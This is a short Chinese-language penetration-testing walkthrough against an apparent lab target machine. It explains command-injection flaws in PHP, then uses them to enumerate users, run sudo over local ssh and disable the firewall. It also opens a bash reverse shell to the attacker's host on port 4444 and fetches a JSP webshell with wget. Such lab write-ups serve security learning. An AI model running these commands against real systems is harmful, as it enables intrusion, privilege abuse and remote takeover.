滲透環境:
主機:192.168.32.152
靶機:192.168.32.1
命令執行漏洞
命令執行漏洞概念:當應用需要調用一些外部程序去處理內容的情況下,就會用到一些執行系統命令的函數。如PHP中的system,exec,shell_exec等,當用戶可以控制命令執行函數中的參數時,將可注入惡意系統命令到正常命令中,造成命令執行攻擊。
漏洞成因:腳本語言優點是簡潔,方便,但也伴隨着一些問題,如速度慢,無法解除系統底層,如果我們開發的應用需要一些除去web的特殊功能時,就需要調用一些外部程序。
開始滲透:
nmap,nikto,dirb掃描,探測
發現開放的端口是8080,發現一個敏感文件
打開
、
發現輸入會有回顯,存在命令執行漏洞
我們就利用這個漏洞:
查看臨時緩沖目錄:ls -alh /tmp
查看home目錄,挖掘用戶信息 ls -alh /home/
查看具體用戶的目錄: ls -alh /home/用戶名/
查看系統消息:uname -a
利用漏洞發現用戶bill有可利用的價值
查看版本信息,發現ubuntu此版本可能存在一個防火牆
此時我們可以利用ssh執行root權限命令
使用ssh 用戶名@localhost 通過ssh登錄服務器不需要驗證身份
查看bill用戶 sudo命令的權限: ssh bill@localhost sudo -l
關閉防火牆: ssh bill@localhost sudo ufw disable
隨后我們就可以上傳反彈shell腳本
方法1.
利用命令執行靶機反彈shell:ssh bill@localhost sudo bash -i>& /dev/tcp/主機ip/4444 0>&1
啟動監聽:nc -nlvp 4444
方法2.
利用命令執行下載木馬文件:
ssh bill@loaclhost sudo wget "http://ip:port/shell.jsp -O +根目錄
開啟python http服務器:python3 -m http.server
拿下靶場